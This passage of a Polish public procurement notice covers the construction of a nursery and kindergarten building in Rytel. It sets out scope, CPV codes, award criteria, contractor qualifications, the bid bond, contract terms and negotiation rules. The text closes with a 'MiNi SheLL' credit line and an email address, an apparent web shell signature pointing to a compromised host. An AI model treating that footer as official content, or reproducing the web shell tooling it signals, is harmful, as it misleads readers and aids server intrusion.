Wykonawca przedstawi Zamawiającemu do zatwierdzenia m.in 3 rodzaje materiałów betonowych wykorzystywanych do wykonywania utwardzeń np. kostka betonowa, płytki betonowe (kolor i kształt wybierze Zamawiający).<br/>4.	Przyłącze kanalizacji deszczowej, wodociągowej i kanalizacji sanitarnej wraz z podłączeniem do sieci zewnętrznych.<br/>5.	Zjazd do drogi publicznej.<br/>6.	Uwaga. Zamawiający jest w trakcie uzyskiwania pozwolenia na budowę.<br/>7.	Przed rozpoczęciem prac wykonanie dokumentacji fotograficznej terenu, na którym będą realizowane roboty budowlane i dostarczenie jej na płycie CD lub DVD do Zamawiającego.<br/>8.	Wykonawca wykona i ustawi 1 szt. tablicy informacyjnej o wymiarach zgodnych z programem dofinansowania, przymocowaną do metalowego stelażu. Wzór poda Zamawiający na przekazaniu placu budowy.<br/>9.	Wykonawca przed podpisaniem umowy przedstawi Zamawiającemu do zatwierdzenia harmonogram rzeczowo- finansowy realizacji całego zadania inwestycyjnego.<br/>Z uwagi na ograniczoną liczbę znaków szczegółowy opis przedmiotu zamówienia znajduje się w zał. nr 6 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45210000-2 - Roboty budowlane w zakresie budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45317000-2 - Inne instalacje elektryczne</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45315000-8 - Instalowanie urządzeń elektrycznego ogrzewania i innego sprzętu elektrycznego w budynkach</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">43325000-7 - Wyposażenie parków i placów zabaw</p> <p class="mb-0">39141000-2 - Meble i wyposażenie kuchni</p> <p class="mb-0">39144000-3 - Meble łazienkowe</p> <p class="mb-0">44411000-4 - Wyroby sanitarne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami oceny ofert: cena - 60% oraz okres gwarancji - 40%, zgodnie z pkt 21 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na na podstawie art. 108 ust. 1 Pzp oraz nie podlegają wykluczeniu na podstawie art. 7 ust. 1 ustawy z dnia 13.04.2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego i spełniają warunki udziału w postępowaniu w zakresie zdolności technicznej lub zawodowej: 1.	Zamawiający żąda od Wykonawcy wykazania się wykonaniem, nie wcześniej niż <br/>w okresie ostatnich 5 lat, a jeśli okres prowadzenia działalności jest krótszy <br/>– w tym okresie, minimum 1 roboty w zakresie wykonania budowy lub rozbudowy lub przebudowy lub nadbudowy budynku w technologii konstrukcji modułowej / szkieletowej drewnianej wraz z instalacjami wewnętrznymi i pracami wykończeniowymi (np. malowanie, układanie wykładzin PCV, tapet, płytek ceramicznych, biały montaż itp.) o pow. użytkowej min. 1.000 m2 i o wartości nie niższej niż 7.000.000,00 zł brutto..<br/>1.1.	Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu określone w pkt 1, jeżeli przedstawi wykaz wykonanych robót tj. minimum 1 roboty w zakresie wykonania budowy lub rozbudowy lub przebudowy lub nadbudowy budynku w technologii konstrukcji modułowej / szkieletowej drewnianej wraz z instalacjami wewnętrznymi <br/>i pracami wykończeniowymi (np. malowanie, układanie wykładzin PCV, tapet, płytek ceramicznych, biały montaż itp.) o pow. użytkowej min. 1.000 m2), z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów na rzecz, których roboty te zostały wykonane, według wzoru stanowiącego załącznik nr 3 do SWZ wraz z dowodami dot. robót wskazanych w wykazie robót, potwierdzającymi, że roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty, a wartość będzie wynosiła nie mniej niż 7.000.000,00 zł brutto (słownie złotych: siedem milionów).<br/>2.	Zamawiający żąda od Wykonawcy wskazania osób, które będą uczestniczyć <br/>w wykonywaniu zamówienia, legitymujące się kwalifikacjami zawodowymi/uprawnieniami odpowiednimi do funkcji, jakie zostaną im powierzone. Wykonawca na każdą funkcję wymienioną poniżej, wskaże osobę, którą musi mieć dostępną na etapie realizacji zamówienia, spełniającą następujące wymagania:<br/>2.1.	Wykonawca skieruje do realizacji zamówienia osobę, która będzie pełnić funkcję kierownika budowy branży budowlanej, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń, w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. j. - Dz. U. z 2025 r. poz. 418ze zm.) oraz Rozporządzenie Ministra Inwestycji i Rozwoju z dn. 29.04.2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2019 r. poz. 831) <br/>2.2.	Wykonawca skieruje do realizacji zamówienia osobę, która będzie pełnić funkcję kierownika robót branży sanitarnej, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. j. - Dz. U. z 2025 r. poz. 418 ze zm.) oraz Rozporządzenie Ministra Inwestycji i Rozwoju z dn. 29.04.2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2019 r. poz. 831).<br/>2.3.	Wykonawca skieruje do realizacji zamówienia osobę, która będzie pełnić funkcję kierownika robót branży elektrycznej i elektroenergetycznej, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: elektrycznych i elektroenergetycznych bez ograniczeń, w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. j. - Dz. U. z 2025 r. poz. 418 ze zm.) oraz Rozporządzenie Ministra Inwestycji i Rozwoju z dn. 29.04.2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2019 r. poz. 831).<br/>3.	Zamawiający, określając wymogi w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (t. j. – Dz. U. z 2025 r. poz. 418 ze zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t. j.-Dz. U. z 2023 r. poz. 334 ze zm.).<br/>4.	Dopuszcza się łączenie funkcji, o których mowa powyżej, przez osobę/osoby pod warunkiem, że osoba/osoby ta/te będzie/będą posiadała/posiadały wymagane kwalifikacje. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t. j. - Dz. U. z 2024 r. poz. 1616 ze zm.), z innym wykonawcą, który złożył odrębną<br/>ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty,<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, według wzoru stanowiącego załącznik nr 9 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. wykaz wykonanych robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów na rzecz, których roboty te zostały wykonane, według wzoru stanowiącego załącznik nr 3 do SWZ wraz z dowodami dot. robót wskazanych w wykazie robót budowlanych, potwierdzające, że roboty zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonywane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>2. wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, według wzoru stanowiącego załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca może złożyć tylko jedną ofertę. Wraz z ofertą wykonawca jest zobowiązany złożyć:<br/>1. oświadczenie, o którym mowa w pkt 11.1.1 SWZ,<br/>2. zobowiązanie podmiotu udostępniającego zasoby (jeżeli dotyczy),<br/>3. oświadczenie, o którym mowa w pkt 11.1.2 SWZ (dotyczy tylko wykonawców wspólnie ubiegających się o zamówienie – np. konsorcja, spółki cywilne),<br/>4. oświadczenie, o którym mowa w pkt 11.1.3 SWZ (w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby),<br/>5. wadium (jeżeli składane jest w formie dokumentu),<br/>6. pełnomocnictwo dla osoby podpisującej ofertę do występowania w imieniu wykonawcy, jeżeli nie wynika to bezpośrednio z dokumentów rejestrowych lub w przypadku o którym mowa w art. 58 ust. 2 ustawy Prawo zamówień publicznych.<br/>Oferta powinna być:<br/>1. sporządzona na podstawie załączników niniejszej SWZ w języku polskim,<br/>.2. złożona przy użyciu środków komunikacji elektronicznej tzn. za pośrednictwem platformazakupowa.pl,<br/>3. podpisana kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osobę/osoby upoważnioną/upoważnione. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 17.1. Zamawiający żąda wniesienia wadium w kwocie: 100.000,00 zł (słownie złotych: sto tysięcy złotych 00/100).<br/>17.2. Wadium może być wniesione według wyboru wykonawcy w jednej lub kilku formach o których mowa w art. 97 ust. 7 ustawy Pzp:<br/>17.2.1. pieniądzu,<br/>17.2.2. gwarancjach bankowych,<br/>17.2.3. gwarancjach ubezpieczeniowych,<br/>17.2.4. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. j. - Dz. U. z 2020 r. poz. 299).<br/>17.3. Wadium należy wnieść przed upływem terminu składania ofert.<br/>17.4. W przypadku wnoszenia wadium w pieniądzu kwotę, o której mowa w pkt 17.1 SWZ należy wpłacić przelewem na rachunek bankowy w Banku Spółdzielczym w Skórczu nr 05 8342 0009 5000 2600 2000 0004 z dopiskiem: wadium – nr postępowania. Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na wskazanym<br/>rachunku bankowym przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert).<br/>17.5. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.<br/>17.6. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt od 17.2.2 – 17.2.4 SWZ, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>17.7. Z treści gwarancji/poręczenia winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w<br/>okolicznościach określonych w art. 98 ust. 6 ustawy Pzp.<br/>17.8. Oferta Wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp zostanie odrzucona.<br/>17.9. Okoliczności i zasady zwrotu wadium oraz jego zatrzymania określa art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w pkt 11.1.1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie składane na podstawie art. 117 ust. 4 Pzp, z którego wynika, które roboty budowlane lub usługi wykonają poszczególni wykonawcy –zgodnie z załącznikiem nr 11 do SWZ.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> W związku z art. 455 ustawy Prawo Zamówień Publicznych zamawiający przewiduje możliwość dokonania zmian w umowie.<br/>Szczegółowy przewidywany zakres zmian zawierają Projektowane postanowienia umowy – załącznik nr 7 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-07 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/czersk</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-07 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-12-06</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Termin wykonania zadania - przedmiotu zamówienia:<br/>1)	etap I: do dnia 25.05.2026 r.<br/>2)	umowy, w tym etap II: do dnia 31.10.2026 r.<br/>2.	Zakończenie realizacji etapu I obejmuje wykonanie budynku opieki nad dziećmi do lat 3 w Rytlu, o którym mowa w § 1 ust. 3 pkt 1 umowy oraz uzyskanie pozwolenia na użytkowanie dla pomieszczeń nr: 01, 02, 03, 04, 05, 44, 43, 22, 23, 41, 24, 25, 28, 26, 27, 29, 06, 07, 08 wraz z niezbędnym zagospodarowaniem terenu i przyłączami zewnętrznymi.<br/>3.	Zakończenie realizacji umowy, w tym etapu II obejmuje wykonanie budynku przedszkola, o którym mowa w § 1 ust. 3 pkt 2 umowy i pozostałe zagospodarowanie terenu oraz uzyskanie pozwolenia na użytkowanie pozostałych pomieszczeń.<br/>4. Zamawiający informuje, że przewiduje wybór najkorzystniejszej oferty z możliwością prowadzenia negocjacji.<br/>5. Zamawiający informuje, że nie przewiduje ograniczenia liczby Wykonawców, których zaprosi do negocjacji.<br/>6. W przypadku podjęcia decyzji o prowadzeniu negocjacji w pierwszym kroku Zamawiający poinformuje równocześnie wszystkich Wykonawców, którzy złożyli oferty, o Wykonawcach: 6.1. których oferty nie zostały odrzucone, oraz punktacji przyznanej ofertom w każdym kryterium oceny ofert i łącznej<br/>punktacji,<br/>6.2. których oferty zostały odrzucone,<br/>6.2.1. podając uzasadnienie faktyczne i prawne.<br/>7. Zamawiający w zaproszeniu do negocjacji wskaże miejsce, termin i sposób prowadzenia negocjacji oraz kryteria oceny ofert, w ramach których będą prowadzone negocjacje w celu ulepszenia treści ofert.<br/>8. Prowadzone negocjacje mają poufny charakter. Żadna ze stron nie może, bez zgody drugiej strony, ujawniać informacji technicznych i handlowych związanych z negocjacjami. Zgoda jest udzielana w odniesieniu do konkretnych informacji i przed ich ujawnieniem.<br/>9. Po zakończeniu negocjacji ze wszystkimi Wykonawcami Zamawiający informuje równocześnie wszystkich wykonawców, których oferty złożone w odpowiedzi na ogłoszenie o zamówieniu nie zostały odrzucone, o zakończeniu negocjacji oraz zaprasza ich do składania ofert dodatkowych.<br/>10. Zaproszenie do złożenia ofert dodatkowych będzie zawierać co najmniej:<br/>10.1. nazwę oraz adres Zamawiającego, numer telefonu, adres poczty elektronicznej oraz strony internetowej prowadzonego postępowania,<br/>10.2. sposób i termin składania ofert dodatkowych oraz język lub języki, w jakich muszą one być sporządzone, oraz termin otwarcia tych ofert.<br/>11. Wykonawca może złożyć ofertę dodatkową, która zawiera nowe propozycje w zakresie treści oferty podlegających ocenie w ramach kryteriów oceny ofert wskazanych przez Zamawiającego w zaproszeniu do negocjacji.<br/>12. Oferta dodatkowa nie może być mniej korzystna w żadnym z kryteriów oceny ofert wskazanych w zaproszeniu do negocjacji niż oferta złożona w odpowiedzi na ogłoszenie o zamówieniu.<br/>13. Oferta przestaje wiązać Wykonawcę w zakresie, w jakim złoży on ofertę dodatkową zawierającą korzystniejsze propozycje w ramach każdego z kryteriów oceny ofert wskazanych w zaproszeniu do negocjacji.<br/>14. Oferta dodatkowa, która jest mniej korzystna w którymkolwiek z kryteriów oceny ofert wskazanych w zaproszeniu do negocjacji niż oferta złożona w odpowiedzi na ogłoszenie o zamówieniu, podlega odrzuceniu.<br/>1. Zamawiający zawiera umowę w sprawie zamówienia publicznego, z uwzględnieniem art. 577 Pzp, w terminie nie krótszym niż 5 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty, jeżeli zawiadomienie to zostało przesłane przy użyciu środków komunikacji elektronicznej, albo 10 dni, jeżeli zostało przesłane w inny sposób. 2. Zamawiający może zawrzeć umowę w sprawie zamówienia publicznego przed upływem terminu, o którym mowa w pkt 1, jeżeli w postępowaniu o udzielenie zamówienia w trybie podstawowym złożono tylko jedną ofertę.<br/>3. Wykonawca, którego oferta uznana zostanie za najkorzystniejszą, będzie<br/>zobowiązany zawrzeć umowę w sprawie zamówienia na warunkach określonych w projektowanych postanowieniach umowy, które stanowią załącznik nr 7 do SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com